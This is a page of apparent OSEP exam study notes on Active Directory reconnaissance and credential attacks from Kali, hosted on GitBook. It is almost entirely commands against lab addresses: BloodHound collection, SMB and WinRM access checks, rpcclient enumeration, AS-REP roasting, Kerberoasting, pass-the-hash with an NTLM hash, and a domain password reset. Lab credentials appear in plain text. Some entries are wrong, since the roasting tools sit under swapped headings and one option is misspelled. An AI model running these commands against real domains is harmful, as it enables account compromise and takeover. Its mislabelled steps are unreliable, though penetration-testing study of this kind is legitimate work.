OSEP Notes
  • Introduction
  • Useful Links, Tools & Tricks
  • OSEP
    • Metasploit Payload & Listener
      • Metasploit Useful Modules
      • Encoder
    • File Transfer & Execution
    • Phishing
    • Local Reconnaissance Windows
      • SQL Server Instance
      • Application Whitelisting & Credentials
    • Local Reconnaissance Linux
      • Ansible
    • Privilege Escalation
    • Pivoting
    • Pass the Hash
      • Remote Access
    • Post Exploitation
      • Add User
      • AMSI, CLM, & App Locker
    • Credentials
    • Lateral Movement
  • Active Directory
    • Domain Reconnaissance on Kali
    • Domain Reconnaissance on Windows
    • Active Directory Forest
Powered by GitBook
On this page
  1. Active Directory

Domain Reconnaissance on Kali

BloodHound

proxychains bloodhound-python -c ALL -u kevin -p 'Passw0rd' -d red.com -dc dc.red.com -ns 10.9.20.10 --dns-tcp

or

proxychains bloodhound-python3 -c ALL -u 'WEB05$@RED.COM' --hashes 00000000000000000000000000000000:d66f37fd3d677522959e5b4aeecafb78 -d COMPLYEDGE.COM  -ns 172.16.76.168 --dns-tcp (Extract NTLM from /etc/krb5cc.keytab)

SMB Access

smbmap -H 10.9.20.10 -u kevin -p Passw0rd

WinRM Access

crackmapexec winrm 10.9.20.10 -u kevin -p 'Password'

SMB Signing

crackmapexec smb 10.9.20.10

User

  • RPCClient

proxychains rpcclient -U red.com/kevin.gustavo%Passw0rd 10.9.20.10

enumdomusers

queryuser 0x3601

  • Impacket

proxychains python3 GetADUsers.py -all -k -no-pass -dc-ip 10.9.20.10 red.com/Administrator

Group

  • RPCClient

enumdomgroups

querygroup 0x200

ASREPoasting

python3 impacket/example/GetUserSPNs.py red.com/ -no-pass -dc-ip 10.9.20.10 -userfile users.txt /fomat:hashcat

Kerberoasting

python3 impacket/example/GetNPUsers.py red.com/kevin:Passw0rd  -dc-ip 10.9.20.10

Overpass the Hash/PTK

python3 impacket/example/getTGT.py red.com/kevin:Passw0rd

Reset AD Password

  • RPCClient

setuserinfo2 lawrencecohen 23 'Passw0rd'
PreviousLateral MovementNextDomain Reconnaissance on Windows

Last updated 2 years ago